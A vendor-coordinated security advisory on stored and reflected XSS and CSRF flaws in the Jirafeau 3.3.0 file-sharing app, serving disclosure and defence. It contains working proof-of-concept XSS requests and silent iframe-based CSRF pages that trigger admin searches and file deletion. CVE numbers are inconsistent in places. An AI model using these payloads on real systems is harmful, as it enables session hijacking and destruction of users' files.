Release Date (Vendor Patch)
May 11, 2018
Reported Date
May 3, 2018
Vendor
Jirafeau
Version Affected
3.3.0
Summary
Jirafeau is an open source file sharing web application, distributed under an AGPL version 3 license. It is a fork of the project Jyraphe and allows users to share files for a defined period and protect downloads via a password. The project’s official website is gitlab.com/mojo42/Jirafeau. The latest version of the application is 3.3.0, released on September 8, 2017. Ten vulnerabilities were identified within the Jirafeau web application – five cross-site scripting vulnerabilities (two stored and three reflected) as well as five cross-site request forgery vulnerabilities.
Vendor Status
The vendor has been notified and, as of May 11, the patched version 3.4.1 has been released. Please update to this version if you haven’t already.
Stored Cross-site Scripting (CVE-2018-11351)
The Jirafeau web application was affected by two stored cross-site scripting (XSS) vulnerabilities that are stored within the description file of the files shared on the application. These vulnerabilities allow the execution of a JavaScript payload each time an administrator searches or lists uploaded files. The vulnerabilities could be exploited without authentication and used to target administrators and steal their sessions.
Vulnerability Details
CVE ID: CVE-2018-11351
Access Vector: Remote
Security Risk: Critical
Vulnerability: CWE-79
CVSS Base Score: 9.8
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Two XSS vulnerabilities are located in the file upload form (/script.php) and are executed on the admin panel (/admin.php). By injecting JavaScript payloads into the file upload form, an attacker could manipulate a user’s session and gain admin access to the application. No authentication is required for exploitation. The weak parameters are Content-Type and filename.
To demonstrate the attack, the following payload could be used for the Content-Type parameter:
<script>alert(/XSS/)</script>
The following payload could be used for the filename parameter:
/<script>alert(/XSS/)</script>
The request below could be used to exploit the vulnerabilities:
POST /script.php HTTP/1.1 Host: HOST Content-Type: multipart/form-data; boundary=---------------------------BOUNDARYID -----------------------------BOUNDARYID Content-Disposition: form-data; name="file"; filename="/<script>alert(/XSS/)</script>file.png" Content-Type: <script>alert(/XSS/)</script> DATA -----------------------------BOUNDARYID Content-Disposition: form-data; name="time" month -----------------------------BOUNDARYID Content-Disposition: form-data; name="key" password -----------------------------BOUNDARYID--
Reflected Cross-site Scripting
(CVE-2018-11350, CVE-2018-11409, CVE-2018-13409)
The Jirafeau web application is affected by three reflected cross-site scripting (XSS) vulnerabilities that require user interaction to be executed.
Vulnerability Details
CVE ID: CVE-2018-11350, CVE-2018-11408, CVE-2018-13409
Access Vector: Remote
Security Risk: Medium
Vulnerability: CWE-79
CVSS Base Score: 6.8
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H
REFLECTED XSS IN THE SEARCH FILE BY NAME FORM (ADMIN PANEL) – CVE-2018-11350
The search file by name form is affected by one cross-site scripting vulnerability. By injecting a JavaScript payload into the search file by name form, an attacker could manipulate user sessions. The weak parameter is name. The following payload can be injected into the name parameter to trigger the vulnerability:
<script>alert(/XSS/)</script>
The request below could be used to exploit the vulnerability:
POST /admin.php HTTP/1.1 Host: HOST Cookie: SESSIONID=SESSIONID; TRACKID=TRACKID; PHPSESSID=SESSIONID2 action=search_by_name&name=%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E
REFLECTED XSS IN THE SEARCH FILE BY HASH FORM (ADMIN PANEL) (CVE-2018-13409)
The search file by hash form is affected by one cross-site scripting vulnerability. By injecting a JavaScript payload into the search file by hash form, an attacker could manipulate user sessions. The weak parameter is hash. The following payload can be injected into the hash parameter to trigger the vulnerability:
<script>alert(/XSS/)</script>
The request below could be used to exploit the vulnerability:
POST /admin.php HTTP/1.1 Host: HOST Cookie: SESSIONID=SESSIONID; TRACKID=TRACKID; PHPSESSID=SESSIONID2 action=search_by_hash&hash=%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E
REFLECTED XSS IN THE SEARCH FILE BY LINK FORM (ADMIN PANEL) (CVE-2018-13408)
The search file by link form is affected by one cross-site scripting vulnerability. By injecting a JavaScript payload into the search file by link form, an attacker could manipulate user sessions. The weak parameter is link. The following payload can be used for the link parameter to trigger the vulnerability:
<script>alert(/XSS/)</script>
The request below could be used to exploit the vulnerability:
POST /admin.php HTTP/1.1 Host: HOST Cookie: SESSIONID=SESSIONID; TRACKID=TRACKID; PHPSESSID=SESSIONID2 action=search_link&link=%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E
Cross-site Request Forgery (lCVE-2018-11349 and CVE-2018-13407)
The Jirafeau web application is affected by five cross-site request forgery (CSRF) vulnerabilities that require user interaction to be executed.
Vulnerability Details
CVE ID: CVE-2018-11349
Access Vector: Remote
Security Risk: High
Vulnerability: CWE-352
CVSS Base Score: 8.8
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CSRF ON SEARCH FILE FUNCTIONALITIES (ADMIN PANEL)
The administration panel is vulnerable to three CSRF attacks on search file functionalities. The vulnerability could be used to force a logged administrator to perform a file search. This CRSF could be used to trigger reflected XSS vulnerabilities which require to be authenticated. The reflected XSS is described in the above section of this document.
This vulnerability could be triggered by driving an administrator logged into the Jirafeau application to a specially crafted web page. The attack could be done silently.
The code snippet below permits the silent exploitation of all three CSRF vulnerabilities by driving a logged administrator to the search file page:
<head>
<title>CSRF Jirafeau</title>
</head>
<body>
<iframe style="display:none" name="csrf-frame1"></iframe>
<form id="csrf-form1" action="http://HOST/admin.php" method="POST" target="csrf-frame1" >
<input type="text" name="action" value="search_by_name" >
<input type="text" name="name" value="PATTERN" >
</form>
<script>document.getElementById("csrf-form1").submit()</script>
<iframe style="display:none" name="csrf-frame2"></iframe>
<form id="csrf-form2" action="http://HOST/admin.php" method="POST" target="csrf-frame2" >
<input type="text" name="action" value="search_by_hash" >
<input type="text" name="hash" value="PATTERN" >
</form>
<script>document.getElementById("csrf-form2").submit()</script>
<iframe style="display:none" name="csrf-frame3"></iframe>
<form id="csrf-form3" action="http://HOST/admin.php" method="POST" target="csrf-frame3" >
<input type="text" name="action" value="search_link" >
<input type="text" name="link" value="PATTERN" >
</form>
<script>document.getElementById("csrf-form3").submit()</script>
</body>
CSRF ON DELETE FILE FUNCTIONALITIES (ADMIN PANEL) (CVE-2018-13407)
The administration panel is vulnerable to two CSRF attacks that could be used to force a logged-in administrator to delete files uploaded by other users of the Jirafeau application. The vulnerabilities could be triggered by driving an administrator logged into the Jirafeau application to a specially crafted web page. This attack could be done silently.
The code snippet can be used to silently exploit both CSRF vulnerabilities by driving a logged-in administrator to use the delete file functionality
<head>
<title>CSRF Jirafeau</title>
</head>
<body>
<iframe style="display:none" name="csrf-frame1"></iframe>
<form id="csrf-form1" action="http://HOST/admin.php" method="POST" target="csrf-frame1" >
<input type="text" name="action" value="clean " >
</form>
<script>document.getElementById("csrf-form1").submit()</script>
<iframe style="display:none" name="csrf-frame2"></iframe>
<form id="csrf-form2" action="http://HOST/admin.php" method="POST" target="csrf-frame2" >
<input type="text" name="action" value="clean_async" >
</form>
<script>document.getElementById("csrf-form2").submit()</script>
</body>
Disclosure Timeline
- October 23, 2017: Initial discovery
- April 3, 2018: Contact with vendor
- May 3, 2018: Vendor acknowledged vulnerabilities
- May 11, 2018: Vendor released patched version 3.4.1
- May 28, 2018: Vulnerabilities publicly disclosed
Researcher
Florian Nivette, Security Associate at Bishop Fox
For Reference
Subscribe to Bishop Fox's Security Blog
Be first to learn about latest tools, advisories, and findings.
Thank You! You have been subscribed.
